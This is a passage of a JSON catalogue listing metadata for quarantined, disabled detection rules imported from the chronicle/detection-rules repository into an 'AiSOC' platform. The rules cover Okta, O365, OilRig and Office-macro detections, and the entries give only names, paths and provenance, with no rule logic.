"chronicle-detection-rules-o365-onedrive-anonymous-link-created-updated", "type": "detection", "name": "o365_onedrive_anonymous_link_created_updated", "description": "o365_onedrive_anonymous_link_created_updated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-onedrive-anonymous-link-created-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_onedrive_anonymous_link_created_updated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_onedrive_anonymous_link_created_updated.yaral" } }, { "id": "chronicle-detection-rules-o365-persistent-login-activity-to-azure-adpowershell-app", "type": "detection", "name": "o365_persistent_login_activity_to_azure_ADPowerShell_app", "description": "o365_persistent_login_activity_to_azure_ADPowerShell_app", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-persistent-login-activity-to-azure-adpowershell-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_persistent_login_activity_to_azure_ADPowerShell_app", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_persistent_login_activity_to_azure_ADPowerShell_app.yaral" } }, { "id": "chronicle-detection-rules-o365-recently-created-entra-id-user-assigned-roles", 
"type": "detection", "name": "o365_recently_created_entra_id_user_assigned_roles", "description": "o365_recently_created_entra_id_user_assigned_roles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-recently-created-entra-id-user-assigned-roles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_recently_created_entra_id_user_assigned_roles", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_recently_created_entra_id_user_assigned_roles.yaral" } }, { "id": "chronicle-detection-rules-offensive-tool-maliciousdllgenerator-dll-side-loadingsysmon", "type": "detection", "name": "offensive_tool_maliciousdllgenerator_dll_side_loadingsysmon", "description": "offensive_tool_maliciousdllgenerator_dll_side_loadingsysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/offensive-tool-maliciousdllgenerator-dll-side-loadingsysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "offensive_tool_maliciousdllgenerator_dll_side_loadingsysmon", "source_commit": "74dd490", "license": 
"Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/offensive_tool_maliciousdllgenerator__dll_side_loading_sysmon.yaral" } }, { "id": "chronicle-detection-rules-office-applications-suspicious-process-activity", "type": "detection", "name": "office_applications_suspicious_process_activity", "description": "office_applications_suspicious_process_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/office-applications-suspicious-process-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "office_applications_suspicious_process_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/office_applications_suspicious_process_activity.yaral" } }, { "id": "chronicle-detection-rules-office-macro-starts-cmd", "type": "detection", "name": "office_macro_starts_cmd", "description": "office_macro_starts_cmd", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/office-macro-starts-cmd.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "office_macro_starts_cmd", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/office_macro_starts_cmd.yaral" } }, { "id": "chronicle-detection-rules-office-starup-folder-persistance", "type": "detection", "name": "office_starup_folder_persistance", "description": "office_starup_folder_persistance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/office-starup-folder-persistance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "office_starup_folder_persistance", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/office_starup_folder_persistance.yaral" } }, { "id": "chronicle-detection-rules-oilirgs-rdat-backdoor-sysmon-detection", "type": "detection", "name": "oilirgs_rdat_backdoor_sysmon_detection", "description": "oilirgs_rdat_backdoor_sysmon_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/oilirgs-rdat-backdoor-sysmon-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilirgs_rdat_backdoor_sysmon_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/oilirg_s__rdat__backdoor__sysmon_detection.yaral" } }, { "id": "chronicle-detection-rules-oilrig", "type": "detection", "name": "oilrig", "description": "oilrig", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oilrig.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilrig", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/oilrig_part_1.yaral" } }, { "id": "chronicle-detection-rules-oilrig-helminth-sysmon-behavior-historic-indicators", "type": "detection", "name": "oilrig_helminth_sysmon_behavior_historic_indicators", "description": "oilrig_helminth_sysmon_behavior_historic_indicators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oilrig-helminth-sysmon-behavior-historic-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilrig_helminth_sysmon_behavior_historic_indicators", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/oilrig_helminth__sysmon_behavior___historic_indicators.yaral" } }, { "id": "chronicle-detection-rules-oilrig-neuron-sysmon-behavior", "type": "detection", "name": "oilrig_neuron_sysmon_behavior", "description": "oilrig_neuron_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oilrig-neuron-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilrig_neuron_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/oilrig_neuron__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-oilrig-part-1", "type": "detection", "name": "oilrig_part_1", "description": "oilrig_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oilrig-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilrig_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/oilrig_part_2.yaral" } }, { "id": "chronicle-detection-rules-okta-mfa-brute-force-attack", "type": "detection", "name": "okta_mfa_brute_force_attack", "description": "okta_mfa_brute_force_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-mfa-brute-force-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_mfa_brute_force_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_mfa_brute_force_attack.yaral" } }, { "id": "chronicle-detection-rules-okta-mismatch-between-source-and-response-for-verify-push-request", "type": "detection", "name": "okta_mismatch_between_source_and_response_for_verify_push_request", "description": "okta_mismatch_between_source_and_response_for_verify_push_request", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-mismatch-between-source-and-response-for-verify-push-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_mismatch_between_source_and_response_for_verify_push_request", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_mismatch_between_source_and_response_for_verify_push_request.yaral" } }, { "id": "chronicle-detection-rules-okta-multiple-failed-requests-to-access-applications", "type": "detection", "name": "okta_multiple_failed_requests_to_access_applications", "description": "okta_multiple_failed_requests_to_access_applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-multiple-failed-requests-to-access-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_multiple_failed_requests_to_access_applications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/okta/okta_multiple_failed_requests_to_access_applications.yaral" } }, { "id": "chronicle-detection-rules-okta-multiple-users-logins-with-invalid-credentials-from-the-same-ip", "type": "detection", "name": "okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip", "description": "okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-multiple-users-logins-with-invalid-credentials-from-the-same-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip.yaral" } }, { "id": "chronicle-detection-rules-okta-new-api-token-created", "type": "detection", "name": "okta_new_api_token_created", "description": "okta_new_api_token_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-new-api-token-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "okta_new_api_token_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_new_api_token_created.yaral" } }, { "id": "chronicle-detection-rules-okta-phishing-detection-with-fastpass-origin-check", "type": "detection", "name": "okta_phishing_detection_with_fastpass_origin_check", "description": "okta_phishing_detection_with_fastpass_origin_check", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-phishing-detection-with-fastpass-origin-check.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_phishing_detection_with_fastpass_origin_check", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_phishing_detection_with_fastpass_origin_check.yaral" } }, { "id": "chronicle-detection-rules-okta-successful-high-risk-user-logins", "type": "detection", "name": "okta_successful_high_risk_user_logins", "description": "okta_successful_high_risk_user_logins", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/okta-successful-high-risk-user-logins.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_successful_high_risk_user_logins", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_successful_high_risk_user_logins.yaral" } }, { "id": "chronicle-detection-rules-okta-suspicious-use-of-a-session-cookie", "type": "detection", "name": "okta_suspicious_use_of_a_session_cookie", "description": "okta_suspicious_use_of_a_session_cookie", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-suspicious-use-of-a-session-cookie.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_suspicious_use_of_a_session_cookie", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_suspicious_use_of_a_session_cookie.yaral" } }, { "id": "chronicle-detection-rules-okta-threatinsight-login-failure-with-high-unknown-users", "type": "detection", "name": "okta_threatinsight_login_failure_with_high_unknown_users", "description": "okta_threatinsight_login_failure_with_high_unknown_users", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-threatinsight-login-failure-with-high-unknown-users.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_threatinsight_login_failure_with_high_unknown_users", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_threatinsight_login_failure_with_high_unknown_users.yaral" } }, { "id": "chronicle-detection-rules-okta-threatinsight-suspected-brute-force-attack", "type": "detection", "name": "okta_threatinsight_suspected_brute_force_attack", "description": "okta_threatinsight_suspected_brute_force_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-threatinsight-suspected-brute-force-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_threatinsight_suspected_brute_force_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_threatinsight_suspected_brute_force_attack.yaral" } }, { "id": "chronicle-detection-rules-okta-threatinsight-suspected-password-spray-attack", 
"type": "detection", "name": "okta_threatinsight_suspected_password_spray_attack", "description": "okta_threatinsight_suspected_password_spray_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-threatinsight-suspected-password-spray-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_threatinsight_suspected_password_spray_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_threatinsight_suspected_password_spray_attack.yaral" } }, { "id": "chronicle-detection-rules-okta-threatinsight-targeted-brute-force-attack", "type": "detection", "name": "okta_threatinsight_targeted_brute_force_attack", "description": "okta_threatinsight_targeted_brute_force_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-threatinsight-targeted-brute-force-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_threatinsight_targeted_brute_force_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_threatinsight_targeted_brute_force_attack.yaral" } }, { "id": "chronicle-detection-rules-okta-user-account-lockout", "type": "detection", "name": "okta_user_account_lockout", "description": "okta_user_account_lockout", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-account-lockout.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_account_lockout", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_account_lockout.yaral" } }, { "id": "chronicle-detection-rules-okta-user-failed-number-challenge-during-push-notification", "type": "detection", "name": "okta_user_failed_number_challenge_during_push_notification", "description": "okta_user_failed_number_challenge_during_push_notification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-failed-number-challenge-during-push-notification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "okta_user_failed_number_challenge_during_push_notification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_failed_number_challenge_during_push_notification.yaral" } }, { "id": "chronicle-detection-rules-okta-user-login-out-of-hours", "type": "detection", "name": "okta_user_login_out_of_hours", "description": "okta_user_login_out_of_hours", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-login-out-of-hours.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_login_out_of_hours", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_login_out_of_hours.yaral" } }, { "id": "chronicle-detection-rules-okta-user-logins-from-multiple-cities", "type": "detection", "name": "okta_user_logins_from_multiple_cities", "description": "okta_user_logins_from_multiple_cities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-logins-from-multiple-cities.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_logins_from_multiple_cities", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_logins_from_multiple_cities.yaral" } }, { "id": "chronicle-detection-rules-okta-user-password-and-mfa-factor-reset-or-deactivated", "type": "detection", "name": "okta_user_password_and_mfa_factor_reset_or_deactivated", "description": "okta_user_password_and_mfa_factor_reset_or_deactivated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-password-and-mfa-factor-reset-or-deactivated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_password_and_mfa_factor_reset_or_deactivated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_password_and_mfa_factor_reset_or_deactivated.yaral" } }, { "id": "chronicle-detection-rules-okta-user-rejected-multiple-push-notifications", "type": "detection", "name": "okta_user_rejected_multiple_push_notifications", "description": "okta_user_rejected_multiple_push_notifications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-rejected-multiple-push-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_rejected_multiple_push_notifications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_rejected_multiple_push_notifications.yaral" } }, { "id": "chronicle-detection-rules-okta-user-suspicious-activity-reported", "type": "detection", "name": "okta_user_suspicious_activity_reported", "description": "okta_user_suspicious_activity_reported", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-suspicious-activity-reported.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_suspicious_activity_reported", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_suspicious_activity_reported.yaral" } }, { "id": "chronicle-detection-rules-ole-controls-registered-via-regsvr32exe-sysmon-behavior", "type": "detection", "name": "ole_controls_registered_via_regsvr32exe_sysmon_behavior", "description": "ole_controls_registered_via_regsvr32exe_sysmon_behavior", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ole-controls-registered-via-regsvr32exe-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ole_controls_registered_via_regsvr32exe_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ole_controls_registered_via_regsvr32_exe__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-olympic-destroyer-detector", "type": "detection", "name": "olympic_destroyer_detector", "description": "olympic_destroyer_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/olympic-destroyer-detector.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "olympic_destroyer_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/olympic_destroyer_detector.yaral" } }, { "id": 
